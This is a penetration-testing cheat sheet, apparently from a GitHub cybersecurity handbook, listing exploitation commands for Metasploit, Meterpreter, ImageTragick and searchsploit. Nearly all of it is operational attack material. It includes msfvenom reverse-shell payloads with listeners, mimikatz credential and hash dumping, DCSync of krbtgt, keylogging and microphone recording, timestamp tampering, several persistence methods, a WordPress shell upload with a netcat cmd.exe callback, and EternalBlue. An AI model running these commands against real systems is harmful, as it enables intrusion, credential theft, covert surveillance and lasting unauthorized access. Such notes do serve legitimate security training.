# Exploitation notes ## Exploitation Tools * [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#Resources) ### Table of Contents * [ImageTragick](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#ImageTragick) * [MSL / Polyglot Attack](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#msl--polyglot-attack) * [Metasploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#Metasploit) * [searchsploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#searchsploit) ### Resources | Name | Description | URL | | ------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ | | Evil-WinRM | The ultimate WinRM shell for hacking/pentesting | | | Exploitalert | Listing of latest Exploits | | | Metasploit | Metasploit Framework | | | TheFatRat | TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. | | ### ImageTragick > ### MSL / Polyglot Attack > #### poc.svg ```c ``` #### Executing Payload ```c $ convert poc.svg poc.png $ cp /tmp/poc.svg /var/www/html/convert_images/ ``` ### Metasploit > > #### General Usage ```c $ sudo msfdb run // start database $ sudo msfdb init // database initialization $ msfdb --use-defaults delete // delete existing databases $ msfdb --use-defaults init // database initialization $ msfdb status // database status msf6 > workspace // metasploit workspaces msf6 > workspace -a // add a workspace msf6 > workspace -r // rename a workspace msf6 > workspace -d // delete a workspace msf6 > workspace -D // delete all workspaces msf6 > db_nmap // execute nmap and add output to database msf6 > hosts // reads hosts from database msf6 > services // reads services from database msf6 > vulns // displaying vulnerabilities msf6 > search // search within metasploit msf6 > set RHOST // set remote host msf6 > set RPORT // set remote port msf6 > run // run exploit msf6 > spool /PATH/TO/FILE // recording screen output msf6 > save // saves current state msf6 > exploit // using module exploit msf6 > payload // using module payload msf6 > auxiliary // using module auxiliary msf6 > encoder // using module encoder msf6 > nop // using module nop msf6 > show sessions // displays all current sessions msf6 > sessions -i 1 // switch to session 1 msf6 > sessions -u // upgrading shell to meterpreter msf6 > sessions -k // kill specific session msf6 > sessions -K // kill all sessions msf6 > jobs // showing all current jobs msf6 > show payloads // displaying available payloads msf6 > set VERBOSE true // enable verbose output msf6 > set forceexploit true // exploits the target anyways msf6 > set EXITFUNC thread // reverse shell can exit without exit the program msf6 > set AutoLoadStdapi false // disables autoload of stdapi msf6 > set PrependMigrate true // enables automatic process migration msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe msf6 > use post/PATH/TO/MODULE // use post exploitation module msf6 > use post/linux/gather/hashdump // use hashdump for Linux msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module C:\> > Ctrl + z // put active meterpreter shell in background meterpreter > loadstdapi // load stdapi meterpreter > background // put meterpreter in background (same as "bg") meterpreter > shell // get a system shell meterpreter > channel -i // get back to existing meterpreter shell meterpreter > ps // checking processes meterpreter > migrate 2236 // migrate to a process meterpreter > getuid // get the user id meterpreter > sysinfo // get system information meterpreter > search -f // search for a file meterpreter > upload // uploading local files to the target meterpreter > ipconfig // get network configuration meterpreter > load powershell // loads powershell meterpreter > powershell_shell // follow-up command for load powershell meterpreter > powershell_execute // execute command meterpreter > powershell_import // import module meterpreter > powershell_shell // shell meterpreter > powershell_session_remove // remove meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress' // network discovery meterpreter > powershell_execute '1..254 | foreach { ".${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName .${_} -Quiet)" }' // network scan meterpreter > powershell_execute 'Test-NetConnection -ComputerName -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded' // port scan meterpreter > load kiwi // load mimikatz meterpreter > help kiwi // mimikatz help meterpreter > kiwi_cmd // execute mimikatz native command meterpreter > lsa_dump_sam // lsa sam dump meterpreter > dcsync_ntlm krbtgt // dc sync meterpreter > creds_all // dump all credentials meterpreter > creds_msv // msv dump meterpreter > creds_kerberos // kerberos dump meterpreter > creds_ssp // ssp dump meterpreter > creds_wdigest // wdigest dump meterpreter > getprivs // get privileges after loading mimikatz meterpreter > getsystem // gain system privileges if user is member of administrator group meterpreter > hashdump // dumps all the user hashes meterpreter > run post/windows/gather/checkvm // check status of the target meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits meterpreter > run post/windows/manage/enable_rdp // enables rdp meterpreter > run post/multi/manage/autoroute // runs autoroutes meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server meterpreter > keyscan_start // enabled keylogger meterpreter > keyscan_dump // showing the output meterpreter > screenshare // realtime screen sharing meterpreter > screenshare -q 100 // realtime screen sharing meterpreter > record_mic // recording mic output meterpreter > timestomp // modify timestamps meterpreter > execute -f calc.exe // starts a program on the victim meterpreter > portfwd add -l -p -r 127.0.0.1 // port forwarding ``` #### Metasploit through Proxychains ```c $ proxychains -q msfconsole ``` #### Meterpreter Listener **Generate Payload** ```c $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o meterpreter_payload.exe ``` **Setup Listener for Microsoft Windows** ```c msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST LHOST => msf6 exploit(multi/handler) > set LPORT LPORT => msf6 exploit(multi/handler) > run ``` **Setup Listener for MacOS** ```c msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST LHOST => msf6 exploit(multi/handler) > set LPORT LPORT => msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp PAYLOAD => python/meterpreter/reverse_tcp msf6 exploit(multi/handler) > exploit ``` **Download Files** ```c $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o .exe ``` ```c msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST LHOST => msf6 exploit(multi/handler) > set LPORT LPORT => msf6 exploit(multi/handler) > run ``` ```c C:\> .\.exe ``` ```c meterpreter > download * ``` #### Enumeration **SNMP Scan** ```c msf6 > use auxiliary/scanner/snmp/snmp_login msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS msf6 auxiliary(scanner/snmp/snmp_login) > run ``` **SNMP Enum** ```c msf6 > use auxiliary/scanner/snmp/snmp_enum msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS msf6 auxiliary(scanner/snmp/snmp_enum) > run ``` **Tomcat Enumeration** ```c msf6 > use auxiliary/scanner/http/tomcat_mgr_login msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS msf6 auxiliary(scanner/http/tomcat_mgr_login) > run ``` **Exploit Suggester** ```c msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > set session 1 msf6 post(multi/recon/local_exploit_suggester) > run ``` #### Execute Binaries **Port Forwarding with Chisel** ```c meterpreter > execute -Hf chisel.exe -a "client -v : R:1092:socks" ``` #### Pivoting **Port Forwarding with Meterpreter** ```c meterpreter > portfwd add -L 127.0.0.1 -l -p -r meterpreter > portfwd add -L 127.0.0.1 -l -p -r ``` **SOCKS Proxy on Meterpreter Sessions** ```c meterpreter > use auxiliary/server/socks_proxy ``` **Pivoting with Meterpreter** ```c meterpreter > run autoroute -s .0/24 background msf > use auxiliary/scanner/portscan/tcp ``` #### Auxiliary Handling **Auxiliary Setup** ```c msf6 > use auxiliary/scanner/http/tvt_nvms_traversal msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run ``` **Auxiliary Output Directory** ```c /home/kali/.msf4/loot/20200623090635_default__nvms.traversal_680948.txt ``` #### Persistence **Setting up Persistent Access** ```c $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe ``` **Copy exploit to target machine** ```c msf6 > use exploit/windows/local/persistence msf6 > set session 1 msf6 > use windows/meterpreter/reverse_tcp ``` **Persistence through persistence\_service** ```c msf6 > use exploit/windows/local/persistence_service msf6 > set session 2 msf6 > set lport 5678 msf6 > exploit ``` ```c msf6 > use exploit/multi/handler msf6 > set payload windows/meterpreter/reverse_tcp msf6 > set lhost msf6 > set lport 5678 msf6 > exploit ``` **Persistence through Persistence\_exe** ```c msf6 > use post/windows/manage/persistence_exe msf6 > set session 1 msf6 > set rexepath /root/payload.exe msf6 > exploit ``` ```c msf6 > use exploit/multi/handler msf6 > set payload windows/meterpreter/reverse_tcp msf6 > set lhost msf6 > set lport 1234 msf6 > exploit ``` **Persistence through Registry** ```c msf6 > use exploit/windows/local/registry_persistence msf6 > set session 1 msf6 > set lport 7654 msf6 > exploit ``` ```c msf6 > use exploit/multi/handler msf6 > set set payload windows/meterpreter/reverse_tcp msf6 > set lhost msf6 > set lport 7654 msf6 > exploit ``` #### Exploit Handling **WP Shell Upload** ```c msf6 > use exploit/unix/webapp/wp_admin_shell_upload msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd! msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT msf6 > run ``` ```c meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads meterpreter > execute -f nc.exe -a "-e cmd.exe " ``` **Dedicated Exploit** ```c msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1 msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit ``` **Additional Options** ```c msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 ``` ### searchsploit ```c $ searchsploit $ searchsploit --cve $ searchsploit -m $ searchsploit -x / ```